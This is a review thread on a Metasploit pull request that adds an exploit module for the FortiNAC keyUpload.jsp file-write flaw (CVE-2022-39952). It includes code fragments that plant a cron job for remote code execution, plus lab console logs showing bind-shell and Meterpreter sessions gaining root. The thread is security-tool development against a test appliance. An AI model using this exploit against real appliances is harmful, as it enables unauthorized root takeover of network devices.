FortiNAC keyUploap.jsp arbitrary file write CVE-2022-39952
rapid7/metasploit-framework pull request #17750
Opened 2023-03-08 19:48 UTC by jheysel-r7

Exploit module for FortiNAC keyUploap.jsp arbitrary file write which results in unauth RCE in the context of the root user. 

## Verification

List the steps needed to make sure this thing works

- [ ]  Follow module documentation to setup vulnerable appliance. 
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/fortinac_keyupload_file_upload`
- [ ] set `RHOSTS` and `LHOST` options
- [ ] do `run`
- [ ] Verify successful hax by confirming a meterpreter session in the context of the root user

Note to reviewer, the patched target I tested (9.4.1) responded with a 404 to the HTTP request issued by the check method.

2023-03-08 23:26 UTC, gwillcox-r7 requested changes

2023-03-08 23:26 UTC, gwillcox-r7 commented on modules/exploits/linux/http/fortinac_keyupload_file_write.rb
> +        'Privileged' => false,
This should be `true` since you get `root` level access to the device.

2023-03-08 23:26 UTC, gwillcox-r7 commented on modules/exploits/linux/http/fortinac_keyupload_file_write.rb
> +    fail_with(Failure::Unknown, 'Failed to send the zip file to keyUpload.jsp') unless res && res.code == 200
`res.body.include?('yams.jsp.portal.SuccessfulUpload')` Should be in here as well?

2023-03-08 23:26 UTC, gwillcox-r7 commented on modules/exploits/linux/http/fortinac_keyupload_file_write.rb
> +    cron_filename = Rex::Text.rand_text_alpha(8)
Having these always be 8 characters long seems a bit odd. Any way we can make these into ranges?

2023-03-08 23:27 UTC, gwillcox-r7 commented
Made some changes, last 3 points I'll leave to you since I needed some input from you to complete them.

2023-03-09 14:56 UTC, smcintyre-r7 commented on documentation/modules/exploit/linux/http/fortinac_keyupload_file_write.md
> +msf6 exploit(multi/http/fortinac_keyupload_file_upload) > run
If the options change in the future, then it's likely the output will need to be changed again. If this is accurate today, that seems sufficient to me.

2023-03-09 15:07 UTC, smcintyre-r7 commented on modules/exploits/linux/http/fortinac_keyupload_file_write.rb
> +    return Exploit::CheckCode::Unknown("Target responded with unexpected HTTP response code: #{res.code}") unless res.code == 200
```suggestion
    return Exploit::CheckCode::Safe("Target responded with unexpected HTTP response code: #{res.code}") unless res.code == 200
```

2023-03-09 15:07 UTC, smcintyre-r7 commented on modules/exploits/linux/http/fortinac_keyupload_file_write.rb
> +      cron_command = "python #{payload_path}"
If the command that cron takes isn't too restricted on what characters it can accept it would be a good idea to drop the ARCH_PYTHON target and substitute in an ARCH_CMD target. This would have a couple of benefits:

* All of the ARCH_CMD payloads would be available to the user
* All of the ARCH_PYTHON payloads would be available to the user with our existing adapters. These payloads would also have the prefix to find a `python2` and `python3` executable automatically incase one is available but `python` is not.

If you need to do a ton of escaping though to make the ARCH_CMD command fit into cron though then this is fine as is but if it's not too much trouble it'd be a nice addition.

2023-03-09 15:07 UTC, smcintyre-r7 commented on modules/exploits/linux/http/fortinac_keyupload_file_write.rb
> +    cron_filename = Rex::Text.rand_text_alpha(8)
This doesn't really seem like something we need to change.

2023-03-09 15:35 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/fortinac_keyupload_file_write.md
> +msf6 exploit(multi/http/fortinac_keyupload_file_upload) > run
Whilst this is nice if this were the case, unfortunately I have seen too many old exploits in my times where the options were not shown and later they changed without the documentation being updated as well. This is more of a comment that is a safety measure to prevent this from happening and also make it easier to fix should this mistake happen.

2023-03-09 17:31 UTC, adfoster-r7 commented on modules/exploits/linux/http/fortinac_keyupload_file_write.rb
> +          This issue is exploitable on the following versions of FortiNAC:
Cross-referencing https://github.com/rapid7/metasploit-framework/pull/17757 - which should (hopefully) improve the output logic to handle this better.

i.e. we should be able to leave this description here as-is

2023-03-11 12:03 UTC, sempervictus commented on modules/exploits/linux/http/fortinac_keyupload_file_write.rb
> +    print_status("Sending zipped #{file_description} to /configWizard/keyUpload.jsp")
Complete and utter nitpick (feel free to ignore): if using `vprint_good` to notify user that the upload succeeded, seems reasonable to `vprint_status` here.

2023-03-13 15:43 UTC, gwillcox-r7 commented on modules/exploits/linux/http/fortinac_keyupload_file_write.rb
> +    print_status("Sending zipped #{file_description} to /configWizard/keyUpload.jsp")
I'd agree with @sempervictus's point here in so far as to say that we should be consistent here with these two messages. I don't really mind if we make them the V versions or not, just that both of them are kept behind the VERBOSE flag or not behind it for consistency. Otherwise this is going to be a little confusing.

2023-03-13 16:43 UTC, gwillcox-r7 commented
Rebasing to bring in recent additions from https://github.com/rapid7/metasploit-framework/pull/17757 so we can check to make sure things work appropriately with that addition.

2023-03-13 17:14 UTC, gwillcox-r7 commented on modules/exploits/linux/http/fortinac_keyupload_file_write.rb
> +          This issue is exploitable on the following versions of FortiNAC:
With this update this seems to be being displayed nicely:

![image](https://user-images.githubusercontent.com/63261883/224775960-cd574fab-097b-423b-b31a-2642ed0a9237.png)

2023-03-13 20:43 UTC, gwillcox-r7 commented on modules/exploits/linux/http/fortinac_keyupload_file_write.rb
> +        'Platform' => %w[linux python],
I thought Python was removed? Shouldn't this be `linux` and `unix`?

2023-03-13 20:43 UTC, gwillcox-r7 commented on modules/exploits/linux/http/fortinac_keyupload_file_write.rb
> +    Exploit::CheckCode::Safe('The target responded with a 200 OK message, however it did not appear to indicate that a successful upload occurred!')
I might adjust this to state that its a blank payload to be clear we aren't actually uploading anything at this point. The statement as its worded atm might concern people if they think its uploading a actual payload, which can be easily misinterpreted from the current wording.

2023-03-13 20:43 UTC, gwillcox-r7 commented on modules/exploits/linux/http/fortinac_keyupload_file_write.rb
> +    vprint_good('Successfully sent zip file')
```suggestion
    fail_with(Failure::Unknown, 'Failed to send the ZIP file to /configWizard/keyUpload.jsp') unless res && res.code == 200 && res.body.include?('yams.jsp.portal.SuccessfulUpload')
    print_good('Successfully sent ZIP file')
```

2023-03-13 20:47 UTC, gwillcox-r7 commented on modules/exploits/linux/http/fortinac_keyupload_file_write.rb
> +    vprint_good('Successfully sent zip file')
Fixed in https://github.com/rapid7/metasploit-framework/pull/17750/commits/3bd4c15704d987f55336e1da839934937602928b

2023-03-13 20:47 UTC, gwillcox-r7 commented on modules/exploits/linux/http/fortinac_keyupload_file_write.rb
> +    Exploit::CheckCode::Safe('The target responded with a 200 OK message, however it did not appear to indicate that a successful upload occurred!')
Fixed in https://github.com/rapid7/metasploit-framework/pull/17750/commits/3bd4c15704d987f55336e1da839934937602928b

2023-03-13 20:53 UTC, gwillcox-r7 approved these changes

2023-03-13 22:20 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/fortinac_keyupload_file_write.md
> +`configIP 192.168.123.11 255.255.255.0 192.168.123.1`
This isn't 100% true. This might not work if your host-only subdomain in VMWare is on a different subnet. Going to `Edit->Virtual Network Editor` and looking at the `Subnet Address` section for the Host Only type entry will show which subnet to use.

2023-03-13 22:33 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/fortinac_keyupload_file_write.md
> +GUI and once complete, restart the machine. You should now have a vulnerable instance of FortiNAC configured.
When you get to the Customer Requirement section its not clear here which options have to be added. It seems like you have to accept both of these as part of the Guided Installation step, though not sure if Manual Installation step is different.

In any case I'd say since this isn't a simple "Accept All Defaults" situation we should be spelling out the steps a bit more.

2023-03-13 22:35 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/fortinac_keyupload_file_write.md
> +GUI and once complete, restart the machine. You should now have a vulnerable instance of FortiNAC configured.
Seems I was able to do this with `Manual Installation`, then `OK` button, then upload the license key _again_, then enter the hostname details and other bits at `https://192.168.116.11:8443/gui/system/config-wizard`

2023-03-13 22:36 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/fortinac_keyupload_file_write.md
> +GUI and once complete, restart the machine. You should now have a vulnerable instance of FortiNAC configured.
Also not clear here if the Network type should just be `None` or what defaults to set here. Going to accept the `None` for now but probs good to call this out.

2023-03-13 22:48 UTC, gwillcox-r7 commented
Seems to be working:

```
msf6 exploit(linux/http/fortinac_keyupload_file_write) > set payload cmd/unix/bind_awk
payload => cmd/unix/bind_awk
msf6 exploit(linux/http/fortinac_keyupload_file_write) > show options

Module options (exploit/linux/http/fortinac_keyupload_file_write):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.116.11   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    8443             yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/bind_awk):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.116.11   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   CMD



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/fortinac_keyupload_file_write) > exploit

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Target indicated a successful upload occurred!
[*] Sending zipped cron job to /configWizard/keyUpload.jsp
[+] Successfully sent ZIP file
[*] Waiting for cron job to run
[*] Started bind TCP handler against 192.168.116.11:4444
[+] Deleted /etc/cron.d/vFBORcdD
[*] Command shell session 1 opened (192.168.153.128:39561 -> 192.168.116.11:4444) at 2023-03-13 17:47:08 -0500

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
uname -a
Linux localhost.localhost.localdomain 3.10.0-1160.53.1.el7.x86_64 #1 SMP Fri Jan 14 13:59:45 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
```

2023-03-13 22:52 UTC, gwillcox-r7 commented
Also working with Meterpreter payload and target 2:

```
msf6 exploit(linux/http/fortinac_keyupload_file_write) > show options

Module options (exploit/linux/http/fortinac_keyupload_file_write):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.116.11   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    8443             yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (linux/x64/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.116.11   no        The target address


Exploit target:

   Id  Name
   --  ----
   2   Linux x64



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/fortinac_keyupload_file_write) > set LPORT 9933
LPORT => 9933
msf6 exploit(linux/http/fortinac_keyupload_file_write) > exploit

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Target indicated a successful upload occurred!
[*] Sending zipped payload to /configWizard/keyUpload.jsp
[+] Successfully sent ZIP file
[*] Sending zipped cron job to /configWizard/keyUpload.jsp
[+] Successfully sent ZIP file
[*] Waiting for cron job to run
[*] Started bind TCP handler against 192.168.116.11:9933
[*] Sending stage (3045348 bytes) to 192.168.116.11
[*] Meterpreter session 2 opened (192.168.153.128:35539 -> 192.168.116.11:9933) at 2023-03-13 17:51:02 -0500
[!] This exploit may require manual cleanup of '/tmp/bYDCAtoV' on the target
[!] This exploit may require manual cleanup of '/etc/cron.d/iSktoyZN' on the target

meterpreter > rm /tmp/bYDCAtoV
meterpreter > rm /tmp/bYDCAtoV
[-] stdapi_fs_delete_file: Operation failed: 1
meterpreter > rm /etc/cron.d/iSktoyZN
meterpreter > rm /etc/cron.d/iSktoyZN
[-] stdapi_fs_delete_file: Operation failed: 1
meterpreter > whoami
[-] Unknown command: whoami
meterpreter > sysinfo
Computer     : localhost.localhost.localdomain
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.53.1.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > pwd
/root
meterpreter >
```

2023-03-13 22:53 UTC, gwillcox-r7 commented
Alright I gtg run to do some errands, but remaining tests are to test against a patched version and then to update the setup instructions to address the points raised.

2023-03-14 14:22 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/fortinac_keyupload_file_write.md
> +GUI and once complete, restart the machine. You should now have a vulnerable instance of FortiNAC configured.
Resolved by https://github.com/rapid7/metasploit-framework/pull/17750/commits/4a4b2a28d21da022fa3c2c8616f25a4c054af262

2023-03-14 14:22 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/fortinac_keyupload_file_write.md
> +interface from Bridged to Host Only. Once the machine turns on, log in with the following default credentials as outlined
Resolved by https://github.com/rapid7/metasploit-framework/pull/17750/commits/4a4b2a28d21da022fa3c2c8616f25a4c054af262

2023-03-14 14:22 UTC, gwillcox-r7 commented on modules/exploits/linux/http/fortinac_keyupload_file_write.rb
> +    print_status("Sending zipped #{file_description} to /configWizard/keyUpload.jsp")
Resolved with recent updates.

2023-03-14 16:10 UTC, merged

2023-03-14 16:12 UTC, gwillcox-r7 commented
# Release Notes
A new exploit has been added for CVE-2022-39952, a vulnerability in FortiNAC's `keyUpload.jsp` page which allows for arbitrary file write as an unauthenticated user. Successful exploitation results in unauthenticated RCE in the context of the `root` user, giving full control over the target device.